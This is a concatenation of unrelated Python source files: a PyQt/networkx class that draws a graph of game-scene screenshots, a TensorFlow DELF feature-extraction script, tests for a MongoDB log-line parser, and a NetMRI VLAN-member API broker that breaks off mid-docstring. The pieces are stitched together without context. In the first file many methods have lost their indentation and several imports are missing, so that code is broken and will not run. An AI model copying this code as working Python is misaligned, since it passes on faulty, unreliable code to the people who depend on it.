from ....utils import set_log_text
from .arrow_line import ArrowLine
# Reference canvas resolution in pixels: HEIGHT centers each column in
# _pos_nodes; WIDTH seeds the minimum-distance search in nearest_node.
WIDTH = 1280
HEIGHT = 720
# Numeric tag for the UI-graph view -- usage not visible here; TODO confirm.
UIGRAPH = 1000
# Semi-transparent fill colors for highlighting a selected image / edge.
DEFAULT_SELECT_IMG_FILL_COLOR = QColor(0, 128, 255, 155)
DEFAULT_SELECT_EDGE_FILL_COLOR = QColor(128, 0, 255, 155)
DEFAULT_SELECT_EDGE_PEN_WIDTH = 5
# Scales for the enlarged preview image (node scale is passed to
# _paint_node_image in _paint_select_node; edge scale presumably analogous).
DEFAULT_PAINT_EDGE_IMG_SCALE = 0.3
DEFAULT_PAINT_NODE_IMG_SCALE = 0.5
DEFAULT_ROOT_NODE = 'group0_scene0.jpg'
DEFAULT_CANVAS_WIDTH = 10
DEFAULT_CANVAS_HEIGHT = 10
# Layout grid cell size in pixels (one column per group; see _pos_nodes).
# DEFAULT_CELL_X = 67
DEFAULT_CELL_X = 100
DEFAULT_CELL_Y = 55
# Scale applied to node screenshots when drawn on the graph canvas.
DEFAULT_IMAGE_SCALE = 0.045
class UIGraph(object):
    def __init__(self):
        """Directed UI graph of game scenes plus the state needed to draw it."""
        self.__graph = nx.DiGraph()  # directed scene-transition graph
        self.__node_pos = dict()  # node -> (x, y) canvas position
        self.__node_sub_graph = dict()  # node -> sub-graph (populated elsewhere)
        self.__node_images = dict()  # node -> screenshot image path
        self.__node_pix_map = dict()  # node -> cached scaled QPixmap
        self.__node_neighbors = dict()  # node -> graph of its direct neighbors
        self.__node_buttons = dict()  # node -> [{button, end_node, click_num}]
        self.__scale = 1.0  # scale applied to node images when drawn
        self.__high_light_node = None  # node currently highlighted
        self.__select_node = None  # node currently selected
        self.__show_image_flag = False  # draw the enlarged selected-node image?
        self.__show_path_flag = False  # path display flag (not read in visible code)
        self.__edge_lines = list()  # drawn edges: {line, from, to}
        self.__high_light_edge = None  # edge currently highlighted
        self.__select_edge = None  # edge currently selected
        self.__text_edit = None  # external text widget updated after painting
        self.__text_content = None  # status text pushed to the widget each paint
        self.__windows_scale = (1.0, 1.0)  # window scale factors
        self.__canvas_scale = 1  # canvas zoom factor used by layout/spacing
        self.__painter_width = 0  # canvas width needed to fit all nodes
        self.__painter_height = 0  # canvas height needed to fit all nodes
        self.__logger = logging.getLogger('sdktool')
    def process(self):
        """Prepare the graph for drawing: cache each node's neighbors, lay out
        node positions, and set the image scale.  Logs (rather than raises)
        on RuntimeError so a bad graph can be reloaded."""
        # save direct neighbors for each node
        try:
            self._neighbors2()
            # position each node
            self._pos_nodes()
            # scale for each node image
            self.__scale = DEFAULT_IMAGE_SCALE
        except RuntimeError as e:
            self.__logger.error("graph process error:%s, please reload graph", e)
    def _pos_nodes(self):
        """Assign an (x, y) canvas position to every node.

        Nodes are grouped by the group id embedded in the file name
        (``groupXX_sceneXX.jpg``).  Each group occupies one column; within a
        column, scenes alternate above and below the vertical center with
        growing offsets.  Also records the canvas size needed to show
        everything in __painter_width / __painter_height.
        """
        nodes = self.__graph.nodes
        groups = {}
        for node in nodes:
            # node name is groupXX_sceneXX.jpg, like: group0_scene0.jpg
            name = str(node)
            # groupXX_sceneXX (drop the ".jpg" suffix)
            base_name = name[:-4]
            sub_names = base_name.split('_')
            # numeric id after the "group" prefix
            group_id = int(sub_names[0][5:])
            if groups.get(group_id) is None:
                groups[group_id] = []
            groups[group_id].append(node)
        group_ids = groups.keys()
        # number of group_id
        # max number of scene in all groups
        # NOTE(review): length_list is computed but never used below.
        length_list = [len(groups.get(gid)) for gid in group_ids]
        length_list.append(1)
        # grid cell size, scaled by the current canvas zoom
        cell_x = int(DEFAULT_CELL_X * self.__canvas_scale)
        cell_y = int(DEFAULT_CELL_Y * self.__canvas_scale)
        col = 1
        self.__painter_width = 0
        self.__painter_height = 0
        for gid in group_ids:
            # one column per group, centered vertically
            cur_pos_x = col * cell_x
            cur_pos_y = HEIGHT / 2
            cur_pos_y = cur_pos_y * self.__canvas_scale
            # alternate nodes above/below the center: offsets 0, -d, +2d, -3d, ...
            space = cell_y
            index = 0
            for node in groups.get(gid):
                cur_pos_y = cur_pos_y + space * index
                space = -space
                index += 1
                if cur_pos_x > self.__painter_width:
                    self.__painter_width = cur_pos_x
                if cur_pos_y > self.__painter_height:
                    self.__painter_height = cur_pos_y
                self.__node_pos[node] = (cur_pos_x, cur_pos_y)
            col += 1
        # leave a margin of one cell on each side
        self.__painter_width = int(self.__painter_width + cell_x * 2)
        self.__painter_height = int(self.__painter_height + cell_y * 2)
def get_painter_size(self):
return self.__painter_width, self.__painter_height
def add_node_button(self, from_node, button, to_node, click_num):
if self.__node_buttons.get(from_node) is None:
self.__node_buttons[from_node] = []
next_ui = dict()
next_ui["button"] = button
next_ui["end_node"] = to_node
next_ui["click_num"] = click_num
self.__node_buttons[from_node].append(next_ui)
# def ResizePixMap(self, scale):
    def add_edge(self, from_node, end_node):
        """Add a directed edge from *from_node* to *end_node* to the graph."""
        self.__graph.add_edge(from_node, end_node)
def add_node_image(self, node, img_path):
old_path = self.__node_images.get(node)
if old_path is not None:
self.__logger.warning("%s old path is %s", node, old_path)
self.__node_images[node] = img_path
    def nodes(self):
        """Return all graph nodes as a list."""
        return list(self.__graph.nodes())
    def edges(self):
        """Return all graph edges as a list of (from_node, end_node) pairs."""
        return list(self.__graph.edges())
def nearest_node(self, x, y, epsilon):
minDis = WIDTH
retNode = None
for node, pos in self.__node_pos.items():
disX = pos[0] - x
disY = pos[1] - y
distance = int(sqrt(disX * disX + disY * disY))
if minDis > distance and distance <= epsilon:
minDis = distance
retNode = node
return retNode
    def set_show_node_image(self, flag):
        """Set whether the selected node's enlarged image should be drawn."""
        self.__show_image_flag = flag
    def set_canvas_scale(self, scale):
        """Set the canvas zoom factor used by layout and edge separation."""
        self.__canvas_scale = scale
    def paint(self, painter):
        """Draw the whole graph: all node images, then the highlight/selection
        overlays, then push the accumulated status text to the text widget."""
        self.__text_content = None
        self._paint_group(painter)
        self._paint_high_light_node(painter)
        self._paint_select_node(painter)
        self._paint_high_light_edge(painter)
        self._paint_select_edge(painter)
        self._update_text_edit(self.__text_content)
def _paint_group(self, painter):
for node in self.nodes():
x, y = self.__node_pos.get(node)
pixmap = self.__node_pix_map.get(node)
if pixmap is None:
path = self.__node_images.get(node)
image = QImage(path)
newImg = image.scaled(int(image.width() * self.__scale), int(image.height() * self.__scale))
pixmap = QPixmap.fromImage(newImg)
self.__node_pix_map[node] = pixmap
painter.drawPixmap(int((x - pixmap.width() / 2)), int(y - pixmap.height() / 2), pixmap)
node_buttons = self.__node_buttons.get(node) or []
leak_click = False
for button in node_buttons:
click_num = button["click_num"]
if click_num == 0:
leak_click = True
if leak_click:
pen = QPen()
pen.setColor(QColor(255, 0, 0))
pen.setWidth(3)
painter.setPen(pen)
painter.drawRect(int((x - pixmap.width() / 2)), int(y - pixmap.height() / 2),
pixmap.width(), pixmap.height())
self.__text_content = None
self.__text_content = 'ui graph images number is {}.\n'.format(len(self.nodes()))
    def intersect_line(self, arrow_lines):
        """Spread out parallel arrows so overlapping edges stay distinguishable.

        Arrows are bucketed by line angle modulo 180 degrees (undirected
        orientation).  A bucket with one arrow is kept as-is; arrows sharing
        an orientation are offset by alternating-sign multiples of a spacing
        step scaled by the current canvas scale.

        Args:
            arrow_lines: iterable of ArrowLine objects to de-overlap.

        Returns:
            A new list of ArrowLine objects with adjusted endpoints.
        """
        degree_dict = dict()
        # Group arrows by undirected orientation (angle mod 180).
        for arrow in arrow_lines:
            angle = arrow.get_line().angle()
            angle = angle % 180
            if degree_dict.get(angle) is None:
                degree_dict[angle] = []
            degree_dict[angle].append(arrow)
        ret_arrows = []
        for angle, arrows in degree_dict.items():
            size = len(arrows)
            if size == 1:
                ret_arrows.append(arrows[0])
            else:
                # Horizontal parallel, adjust y coordinate
                space_x = 0
                space_y = 0
                if angle == 90:
                    # Vertical lines: shift copies along x.
                    space_x = DEFAULT_CELL_X / (size * 2 + 1) * self.__canvas_scale
                else:
                    # All other orientations: shift copies along y.
                    space_y = DEFAULT_CELL_Y / (size * 2 + 1) * self.__canvas_scale
                index = 0
                for arrow in arrows:
                    line = arrow.get_line()
                    pt1 = line.p1()
                    p1x = pt1.x()
                    p1y = pt1.y()
                    pt2 = line.p2()
                    p2x = pt2.x()
                    p2y = pt2.y()
                    # Offset magnitude grows with index while the spacing sign
                    # alternates each iteration, fanning arrows to both sides.
                    offset_x = space_x * index
                    offset_y = space_y * index
                    p1x += offset_x
                    p1y += offset_y
                    p2x += offset_x
                    p2y += offset_y
                    space_x = -space_x
                    space_y = -space_y
                    index += 1
                    from_node = arrow.get_from_node()
                    end_node = arrow.get_end_node()
                    ret_arrows.append(ArrowLine((p1x, p1y), (p2x, p2y), from_node, end_node))
        return ret_arrows
    def _paint_select_node(self, painter):
        """Draw the selected node's neighbor sub-graph as arrows.

        Rebuilds self.__edge_lines (the clickable edge records consumed by
        nearest_edge) from the painted arrows, optionally paints the selected
        node's screenshot, and updates the status text.
        """
        self.__edge_lines.clear()
        if self.__select_node is not None:
            sub_graph = self.__node_neighbors.get(self.__select_node)
            if sub_graph is not None:
                arrows = []
                for from_node, to_node in sub_graph.edges():
                    x1, y1 = self.__node_pos.get(from_node)
                    x2, y2 = self.__node_pos.get(to_node)
                    arrow = ArrowLine((x1, y1), (x2, y2), from_node, to_node)
                    arrows.append(arrow)
                # De-overlap parallel arrows before painting.
                ret_arrows = self.intersect_line(arrows)
                for arrow in ret_arrows:
                    arrow.paint(painter)
                    line = arrow.get_line()
                    edge = dict()
                    edge['line'] = line
                    edge['from'] = arrow.get_from_node()
                    edge['to'] = arrow.get_end_node()
                    self.__edge_lines.append(edge)
            if self.__show_image_flag is True:
                self._paint_node_image(painter, self.__select_node, DEFAULT_PAINT_NODE_IMG_SCALE)
            self.__text_content = 'selected: {}'.format(self.__select_node)
    def _paint_high_light_node(self, painter):
        """Fill a rectangle over the highlighted node's pixmap and update the
        status text."""
        if self.__high_light_node is not None:
            x, y = self.__node_pos.get(self.__high_light_node)
            pixMap = self.__node_pix_map.get(self.__high_light_node)
            line_path = QPainterPath()
            width = pixMap.width()
            height = pixMap.height()
            # Trace the pixmap's bounding rectangle centered on (x, y).
            line_path.moveTo(x - width / 2, y - height / 2)
            line_path.lineTo(x - width / 2, y + height / 2)
            line_path.lineTo(x + width / 2, y + height / 2)
            line_path.lineTo(x + width / 2, y - height / 2)
            line_path.lineTo(x - width / 2, y - height / 2)
            painter.fillPath(line_path, DEFAULT_SELECT_IMG_FILL_COLOR)
            self.__text_content = 'highlight: {}'.format(self.__high_light_node)
    def _paint_edge_image(self, painter, node1, node2, scale):
        """Paint node1's and node2's screenshots side by side for an edge.

        The button on node1 whose "end_node" is node2 is outlined in green on
        the source screenshot before display; both screenshots are scaled and
        drawn at fixed horizontal positions, vertically centered between the
        two nodes' y coordinates.
        """
        path1 = self.__node_images.get(node1)
        cv_image = cv2.imread(path1)
        button_list = self.__node_buttons.get(node1)
        for button in button_list:
            node = button.get("end_node")
            if node is node2:
                # Outline the button that transitions node1 -> node2.
                x, y, w, h = button.get("button")
                cv2.rectangle(cv_image, (x, y), (x + w, y + h), (0, 255, 0), 5)
        img_rgb = cv2.cvtColor(cv_image, cv2.COLOR_BGR2BGRA)
        # NOTE(review): the buffer is BGRA but the QImage is declared
        # Format_RGB32; red/blue channels may appear swapped -- confirm.
        QtImg1 = QImage(img_rgb.data, img_rgb.shape[1], img_rgb.shape[0], QImage.Format_RGB32)
        _, y1 = self.__node_pos.get(node1)
        _, y2 = self.__node_pos.get(node2)
        pixmap1 = QPixmap.fromImage(QtImg1)
        # pixmap = QPixmap.fromImage(QImage(path))
        width1 = int(scale * pixmap1.width())
        height1 = int(scale * pixmap1.height())
        pixmap1 = pixmap1.scaled(width1, height1, Qt.KeepAspectRatio)
        # Source screenshot on the left side of the canvas.
        x1 = int(WIDTH * 0.15)
        # y1 = int(HEIGHT * 0.25)
        painter.drawPixmap(x1, int( (y1 + y2) / 2), pixmap1)
        path2 = self.__node_images.get(node2)
        pixmap2 = QPixmap.fromImage(QImage(path2))
        width2 = int(scale * pixmap2.width())
        height2 = int(scale * pixmap2.height())
        pixmap2 = pixmap2.scaled(width2, height2, Qt.KeepAspectRatio)
        # Destination screenshot on the right side of the canvas.
        x2 = int(WIDTH * 0.55)
        # y2 = int(HEIGHT * 0.25)
        painter.drawPixmap(x2, int((y1 + y2) / 2), pixmap2)
    def _paint_node_image(self, painter, node, scale):
        """Paint the node's screenshot with its buttons outlined.

        Unclicked buttons (click_num == 0) are outlined in red (BGR
        (0, 0, 255)), clicked ones in green; the annotated image is then
        scaled by `scale` and drawn at the node's layout position.
        """
        path = self.__node_images.get(node)
        cv_image = cv2.imread(path)
        # buttonList = []
        button_list = self.__node_buttons.get(node) or []
        for button in button_list:
            x, y, w, h = button.get("button")
            click_num = button.get("click_num")
            if click_num == 0:
                color = (0, 0, 255)
            else:
                color = (0, 255, 0)
            cv2.rectangle(cv_image, (x, y), (x + w, y + h), color, 5)
        img_rgb = cv2.cvtColor(cv_image, cv2.COLOR_BGR2BGRA)
        QtImg = QImage(img_rgb.data, img_rgb.shape[1], img_rgb.shape[0], QImage.Format_RGB32)
        x, y = self.__node_pos.get(node)
        # pixmap = QPixmap.fromImage(QImage(path))
        pixmap = QPixmap.fromImage(QtImg)
        width = int(scale * pixmap.width())
        height = int(scale * pixmap.height())
        pixmap = pixmap.scaled(width, height, Qt.KeepAspectRatio)
        painter.drawPixmap(x, y, pixmap)
    def _paint_high_light_edge(self, painter):
        """Redraw the highlighted edge's line with the highlight pen and
        update the status text."""
        if self.__high_light_edge:
            x1 = self.__high_light_edge['line'].p1().x()
            y1 = self.__high_light_edge['line'].p1().y()
            x2 = self.__high_light_edge['line'].p2().x()
            y2 = self.__high_light_edge['line'].p2().y()
            pen = QPen()
            pen.setWidth(DEFAULT_SELECT_EDGE_PEN_WIDTH)
            pen.setColor(DEFAULT_SELECT_EDGE_FILL_COLOR)
            painter.setPen(pen)
            painter.drawLine(x1, y1, x2, y2)
            self.__text_content = 'highlight: {} ---> {}'.format(self.__high_light_edge.get("from"),
                                                                 self.__high_light_edge.get("to"))
def _paint_select_edge(self, painter):
if self.__select_edge is not None:
from_node = self.__select_edge.get("from")
to_node = self.__select_edge.get("to")
self._paint_edge_image(painter, from_node, to_node, DEFAULT_PAINT_EDGE_IMG_SCALE)
self.__text_content = 'selected: {} ---> {}'.format(from_node, to_node)
    def set_select_node(self, node):
        # Mark the given node as selected for the next paint pass.
        self.__select_node = node
    def clear_select_node(self):
        # Drop the current node selection.
        self.__select_node = None
    def set_high_light_node(self, node):
        # Mark the given node as highlighted (e.g. hovered) for painting.
        self.__high_light_node = node
    def clear_highlight_node(self):
        # Drop the current node highlight.
        self.__high_light_node = None
def nearest_edge(self, x, y, epsilon):
min_dis = WIDTH
ret_edge = None
for item in self.__edge_lines:
x1 = item['line'].p1().x()
y1 = item['line'].p1().y()
x2 = item['line'].p2().x()
y2 = item['line'].p2().y()
distance = self._point_to_line(x, y, x1, y1, x2, y2)
if min_dis > distance and distance <= epsilon:
min_dis = distance
ret_edge = item
return ret_edge
    def set_select_edge(self, edge):
        # Mark the given edge record as selected for the next paint pass.
        self.__select_edge = edge
    def clear_select_edge(self):
        # Drop the current edge selection.
        self.__select_edge = None
    def set_highlight_edge(self, edge):
        # Mark the given edge record as highlighted for painting.
        self.__high_light_edge = edge
    def clear_high_light_edge(self):
        # Drop the current edge highlight.
        self.__high_light_edge = None
@staticmethod
def _point_to_line(x, y, x1, y1, x2, y2):
# given point A(x1, y1),B(x2, y2), computer distance of point C (x, y) to |AB|
# | AB | * | AC |* cos(x)
cross = (x2 - x1) * (x - x1) + (y2 - y1) * (y - y1)
# cos(x) < 0 , the degree of angle(AB, AC) no less than 90 degree
# distance = |AC|
if cross <= 0:
return math.sqrt((x - x1) * (x - x1) + (y - y1) * (y - y1) + 0.0)
# | AB |
d2 = (x2 - x1) * (x2 - x1) + (y2 - y1) * (y2 - y1)
# |AC| >= |AB|, the degree of angle((BA, BC)) no less than 90 degree
# distance = |BC|
if cross >= d2:
return math.sqrt((x - x2) * (x - x2) + (y - y2) * (y - y2))
r = cross / d2
# D(px,py) in AB, and AD is perpendicular to AB
px = x1 + (x2 - x1) * r
py = y1 + (y2 - y1) * r
return math.sqrt((x - px) * (x - px) + (y - py) * (y - py))
def find_longest_path(self, dst_node):
path = dict(nx.all_pairs_shortest_path(self.__graph))
max_len = 0
path_nodes = []
for src_node in self.__graph.nodes:
node_list = path[src_node].get(dst_node) or []
if len(node_list) > max_len:
max_len = len(node_list)
path_nodes = node_list
return path_nodes
    def _neighbors2(self):
        """Build the per-node neighbor sub-graph cache from shortest paths.

        For every node, the shortest path from DEFAULT_ROOT_NODE is turned
        into a small directed path graph and stored in self.__node_neighbors.
        When no path exists from the root, the longest available path ending
        at the node (from any source) is used instead; such misses are
        counted and logged.
        """
        path = dict(nx.all_pairs_shortest_path(self.__graph))
        root_node = DEFAULT_ROOT_NODE
        if root_node not in path.keys():
            # The root node is not in the graph at all; nothing to build.
            self.__logger.error("rootNode is not keys")
            return
        sum_no_path = 0
        for node in self.__graph.nodes:
            node_list = path[root_node].get(node)
            if node_list is None:
                # No path from the root: fall back to the longest path
                # reaching this node from any source.
                self.__logger.error("there is no path %s---->%s", root_node, node)
                sum_no_path += 1
                node_list = self.find_longest_path(node)
            graph = nx.DiGraph()
            pre_node = None
            # Chain consecutive path nodes into a directed path graph.
            for subNode in node_list:
                if pre_node is None:
                    pre_node = subNode
                    continue
                else:
                    graph.add_edge(pre_node, subNode)
                    pre_node = subNode
            self.__node_neighbors[node] = graph
        self.__logger.error("sum number of no path from root is %s", sum_no_path)
    def set_text_edit(self, text_edit):
        # Keep a reference to the text edit widget.  NOTE(review): this
        # attribute is not read anywhere in this section; status text is
        # pushed through set_log_text instead -- confirm it is still needed.
        self.__text_edit = text_edit
    @staticmethod
    def _update_text_edit(text):
        """Push the current status text to the log widget via set_log_text."""
        # print(text)
        set_log_text(text)
|
# Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
This script is forked from tensorflow-delf !
https://github.com/tensorflow/models/tree/master/research/delf
"""
import os
import time
from tqdm import tqdm
import tensorflow as tf
from google.protobuf import text_format
from delf import delf_config_pb2
from delf import feature_extractor
from delf import feature_io
# Parsed command-line flags placeholder (not used by this entry point).
cmd_args = None

# Extension of feature files.
_DELF_EXT = '.delf'

# Pace to report extraction log.
_STATUS_CHECK_ITERATIONS = 100
def _ReadImageList(list_path):
    """Helper function to read image paths.

    Args:
        list_path: Path to list of images, one image path per line.

    Returns:
        image_paths: List of image paths with trailing whitespace stripped.
    """
    with tf.gfile.GFile(list_path, 'r') as f:
        return [entry.rstrip() for entry in f.readlines()]
def main(data_type, dir_input='../../input'):
    """Extract DELF features for every image under dir_input/data_type.

    Args:
        data_type: Dataset split subdirectory name ('train', 'index', 'test').
        dir_input: Root directory containing the split subdirectories.

    Side effects:
        Writes one <image-name>.delf file per image into
        ../../input_large_delf/<data_type>, skipping images whose descriptor
        file already exists.
    """
    tf.logging.set_verbosity(tf.logging.INFO)
    # Read list of images.
    tf.logging.info('Reading list of images...')
    list_images_path = os.path.join(dir_input, data_type)
    image_names = os.listdir(list_images_path)
    image_paths = [os.path.join(list_images_path, s) for s in image_names]
    num_images = len(image_paths)
    tf.logging.info('done! Found %d images', num_images)
    # Parse DelfConfig proto.
    config = delf_config_pb2.DelfConfig()
    config_path = 'delf_config_example.pbtxt'
    with tf.gfile.FastGFile(config_path, 'r') as f:
        text_format.Merge(f.read(), config)
    # Create output directory if necessary.
    dir_output = os.path.join('../../input_large_delf', '{}'.format(data_type))
    os.makedirs(dir_output, exist_ok=True)
    config_session = tf.ConfigProto(gpu_options=tf.GPUOptions(allow_growth=True))
    # Tell TensorFlow that the model will be built into the default Graph.
    with tf.Graph().as_default():
        # Reading list of images.
        filename_queue = tf.train.string_input_producer(image_paths, shuffle=False)
        reader = tf.WholeFileReader()
        _, value = reader.read(filename_queue)
        image_tf = tf.image.decode_jpeg(value, channels=3)
        with tf.Session(config=config_session) as sess:
            # Initialize variables.
            init_op = tf.global_variables_initializer()
            sess.run(init_op)
            # Loading model that will be used.
            tf.saved_model.loader.load(sess, [tf.saved_model.tag_constants.SERVING], config.model_path)
            graph = tf.get_default_graph()
            input_image = graph.get_tensor_by_name('input_image:0')
            input_score_threshold = graph.get_tensor_by_name('input_abs_thres:0')
            input_image_scales = graph.get_tensor_by_name('input_scales:0')
            input_max_feature_num = graph.get_tensor_by_name('input_max_feature_num:0')
            boxes = graph.get_tensor_by_name('boxes:0')
            raw_descriptors = graph.get_tensor_by_name('features:0')
            feature_scales = graph.get_tensor_by_name('scales:0')
            attention_with_extra_dim = graph.get_tensor_by_name('scores:0')
            # Flatten the attention scores to a 1-D tensor.
            attention = tf.reshape(attention_with_extra_dim,
                                   [tf.shape(attention_with_extra_dim)[0]])
            locations, descriptors = feature_extractor.DelfFeaturePostProcessing(boxes, raw_descriptors, config)
            # Start input enqueue threads.
            coord = tf.train.Coordinator()
            threads = tf.train.start_queue_runners(sess=sess, coord=coord)
            # BUGFIX: time.clock() was deprecated since Python 3.3 and removed
            # in 3.8; time.time() reports the wall-clock elapsed time that the
            # progress log actually describes.
            start = time.time()
            for i in tqdm(range(num_images), total=num_images):
                # Write to log-info once in a while.
                if i == 0:
                    tf.logging.info('Starting to extract DELF features from images...')
                elif i % _STATUS_CHECK_ITERATIONS == 0:
                    elapsed = (time.time() - start)
                    tf.logging.info('Processing image %d out of %d, last %d '
                                    'images took %f seconds', i, num_images,
                                    _STATUS_CHECK_ITERATIONS, elapsed)
                    start = time.time()
                # Get next image.
                im = sess.run(image_tf)
                # If descriptor already exists, skip its computation.
                out_desc_filename = os.path.splitext(os.path.basename(image_paths[i]))[0] + _DELF_EXT
                out_desc_fullpath = os.path.join(dir_output, out_desc_filename)
                if tf.gfile.Exists(out_desc_fullpath):
                    tf.logging.info('Skipping %s', image_paths[i])
                    continue
                # Extract and save features.
                (locations_out, descriptors_out, feature_scales_out, attention_out) = sess.run(
                    [locations, descriptors, feature_scales, attention],
                    feed_dict={
                        input_image: im,
                        input_score_threshold: config.delf_local_config.score_threshold,
                        input_image_scales: list(config.image_scales),
                        input_max_feature_num: config.delf_local_config.max_feature_num
                    })
                feature_io.WriteToFile(out_desc_fullpath, locations_out,
                                       feature_scales_out, descriptors_out, attention_out)
            # Finalize enqueue threads.
            coord.request_stop()
            coord.join(threads)
if __name__ == '__main__':
    # Run feature extraction for every dataset split, in the same order.
    for data_split in ('train', 'index', 'test'):
        main(data_split)
|
<filename>mtools/test/test_util_logline.py
import sys
from nose.tools import *
from mtools.util.logline import LogLine
import time
line_ctime_pre24 = "Sat Aug 3 21:52:05 [initandlisten] db version v2.2.4, pdfile version 4.5"
line_ctime = "Sat Aug 3 21:52:05.995 [initandlisten] db version v2.4.5"
line_iso8601_local = "2013-08-03T21:52:05.995+1000 [initandlisten] db version v2.5.2-pre-"
line_iso8601_utc = "2013-08-03T11:52:05.995Z [initandlisten] db version v2.5.2-pre-"
line_getmore = "Mon Aug 5 20:26:32 [conn9] getmore local.oplog.rs query: { ts: { $gte: new Date(5908578361554239489) } } cursorid:1870634279361287923 ntoreturn:0 keyUpdates:0 numYields: 107 locks(micros) r:85093 nreturned:13551 reslen:230387 144ms"
line_253_numYields = "2013-10-21T12:07:27.057+1100 [conn2] query test.docs query: { foo: 234333.0 } ntoreturn:0 ntoskip:0 keyUpdates:0 numYields:1 locks(micros) r:239078 nreturned:0 reslen:20 145ms"
line_246_numYields = "Mon Oct 21 12:14:21.888 [conn4] query test.docs query: { foo: 23432.0 } ntoreturn:0 ntoskip:0 nscanned:316776 keyUpdates:0 numYields: 2405 locks(micros) r:743292 nreturned:2 reslen:2116 451ms"
def test_logline_datetime_parsing():
    """ Check that all four timestamp formats are correctly parsed. """
    # ctime without milliseconds (pre-2.4 log format)
    ll = LogLine(line_ctime_pre24)
    ll_str = ll.line_str
    assert(str(ll.datetime) == '2013-08-03 21:52:05')
    assert(ll._datetime_format == 'ctime-pre2.4')
    # Parsing must not mutate the stored line string.
    # (Removed two Python-2-only `print` statements that were leftover
    # debug output and break the file under Python 3.)
    assert(ll.line_str == ll_str)

    # ctime with milliseconds (2.4+ log format)
    ll = LogLine(line_ctime)
    ll_str = ll.line_str
    assert(str(ll.datetime) == '2013-08-03 21:52:05.995000')
    assert(ll._datetime_format == 'ctime')
    assert(ll.line_str == ll_str)

    # ISO 8601 with UTC ("Z") timezone
    ll = LogLine(line_iso8601_utc)
    ll_str = ll.line_str
    assert(str(ll.datetime) == '2013-08-03 11:52:05.995000+00:00')
    assert(ll._datetime_format == 'iso8601-utc')
    assert(ll.line_str == ll_str)

    # ISO 8601 with a local timezone offset
    ll = LogLine(line_iso8601_local)
    ll_str = ll.line_str
    assert(str(ll.datetime) == '2013-08-03 21:52:05.995000+10:00')
    assert(ll._datetime_format == 'iso8601-local')
    assert(ll.line_str == ll_str)
def test_logline_extract_new_and_old_numYields():
    """ Check numYields extraction for both log spellings. """
    # 2.4.6-style line uses "numYields: N" (with space)
    ll = LogLine(line_246_numYields)
    assert(ll.numYields == 2405)
    # 2.5.3-style line uses "numYields:N" (no space)
    ll = LogLine(line_253_numYields)
    assert(ll.numYields == 1)
def test_logline_value_extraction():
    """ Check for correct value extraction of all fields. """
    # A getmore on the oplog with full counters present.
    ll = LogLine(line_getmore)
    assert(ll.thread == 'conn9')
    assert(ll.operation == 'getmore')
    assert(ll.namespace == 'local.oplog.rs')
    # Duration is the trailing "144ms" value.
    assert(ll.duration == 144)
    assert(ll.numYields == 107)
    assert(ll.r == 85093)
    assert(ll.ntoreturn == 0)
    assert(ll.nreturned == 13551)
    # Query shape: field names only, values replaced by 1.
    assert(ll.pattern == '{ts: 1}')
def test_logline_lazy_evaluation():
    """ Check that all LogLine variables are evaluated lazily. """
    fields = ['_thread', '_operation', '_namespace', '_duration', '_numYields',
              '_r', '_ntoreturn', '_nreturned', '_pattern']

    # before parsing all member variables need to be None
    ll = LogLine(line_getmore)
    for attr in fields:
        # PEP 8: compare against None with `is`, not `==`.
        assert(getattr(ll, attr) is None)

    # after parsing, they all need to be filled out
    ll.parse_all()
    for attr in fields:
        assert(getattr(ll, attr) is not None)
|
<filename>infoblox_netmri/api/broker/v3_8_0/vlan_member_broker.py
from ..broker import Broker
class VlanMemberBroker(Broker):
controller = "vlan_members"
def show(self, **kwargs):
"""Shows the details for the specified vlan member.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned and included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_member: The vlan member identified by the specified VlanMemberID.
:rtype vlan_member: VlanMember
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available vlan members. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
:type VlanID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
:type VlanID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the vlan members as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
